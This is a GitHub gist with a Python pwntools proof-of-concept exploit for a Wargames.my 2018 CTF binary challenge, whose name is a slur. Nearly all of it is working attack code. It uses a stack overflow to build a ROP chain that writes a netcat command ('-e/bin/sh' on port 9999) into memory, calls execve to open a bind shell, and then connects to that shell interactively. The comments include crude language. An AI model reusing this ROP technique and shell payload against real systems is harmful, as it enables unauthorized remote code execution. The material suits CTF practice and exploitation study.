Created
December 10, 2018 10:57
-
-
Save shahrilnet/d9c3978b485a3b085e73fb7f71a4a4e1 to your computer and use it in GitHub Desktop.
POC for Wargames.my 2018's faggot2.0 challenge
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.terminal = ['konsole', '-e', 'sh', '-c'] | |
| def split2len(s, n): | |
| def _f(s, n): | |
| while s: | |
| yield s[:n] | |
| s = s[n:] | |
| return list(_f(s, n)) | |
| ''' | |
| START BUILDING OUR ROP CHAINS | |
| ''' | |
| def write(addr, data): | |
| ''' write data into addr ''' | |
| addr = addr + 8 # to suite [rbp-8] | |
| payload = '' | |
| for each in split2len(data, 4): | |
| payload += p64(0x400840) # pop rbp; ret; | |
| payload += p64(addr) # rbp = addr | |
| payload += p64(0x4009d2) # pop rax; ret; | |
| payload += each.ljust(8, '\x00') # rax = string chunk with left 0x0 padding | |
| payload += p64(0x4009cf) # mov dword ptr [rbp - 8], eax; pop rax; ret; | |
| payload += 'junk'*2 | |
| addr += 4 | |
| return payload | |
| # ROP addresses | |
| WRITABLE_ADDR = 0x602000 | |
| payload = 'A'*152 # padding before return address overwrite | |
| exec_code = '/usr/bin/nc -lvp9999 -e/bin/sh'.split(' ') | |
| # write `exec_code` into writable section | |
| addr = [] | |
| for each in exec_code: | |
| payload += write(WRITABLE_ADDR, each) | |
| addr.append(WRITABLE_ADDR) | |
| WRITABLE_ADDR += len(each) + 1 # reason for +1 is to don't overwrite null terminator | |
| # write addresses into memory to mimic argv[], for our execve() friend | |
| addr.append(0x0) | |
| payload += write(WRITABLE_ADDR, ''.join([p64(each) for each in addr])) | |
| ''' | |
| ref: http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/ | |
| sys_execve (rax = 51) | |
| 1st param (rdi) = const char *filename) | |
| 2nd param (rsi) = const char *const argv[] | |
| 3rd param (rdx) = const char *const envp[] | |
| ''' | |
| # prepare rsi | |
| payload += p64(0x400ba1) # pop rsi; pop r15; ret; | |
| payload += p64(WRITABLE_ADDR) | |
| payload += 'junk'*2 | |
| # prepare rdi | |
| payload += p64(0x400ba3) # pop rdi; ret; | |
| payload += p64(addr[0]) | |
| # prepare rax | |
| payload += p64(0x4009d2) # pop rax; ret; | |
| payload += p64(59) | |
| # get shell, bitch! | |
| payload += p64(0x4009d4) # syscall -> execve("nc", {"nc", "-lvp9999", "-e/bin/sh", NULL}, envp); | |
| # end peacefully | |
| ''' | |
| payload += p64(0x400ba3) # pop rdi; ret; | |
| payload += p64(0x0) | |
| payload += p64(0x4009d2) # pop rax; ret; | |
| payload += p64(60) | |
| payload += p64(0x4009d4) # syscall -> exit(0) | |
| ''' | |
| ''' | |
| END BUILDING OUR ROP CHAINS | |
| ''' | |
| p = process('./faggot2.0') | |
| """ | |
| gdb.attach(p, ''' | |
| set follow-fork-mode child | |
| break *0x4008D6 | |
| break *0x40091C | |
| continue | |
| ''') | |
| """ | |
| print(payload) | |
| r = remote('127.0.0.1', 31337) | |
| r.sendline(str(len(payload))) | |
| r.sendline(payload) | |
| # wait for netcat | |
| sleep(5) | |
| r2 = remote('127.0.0.1', 9999) | |
| r2.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment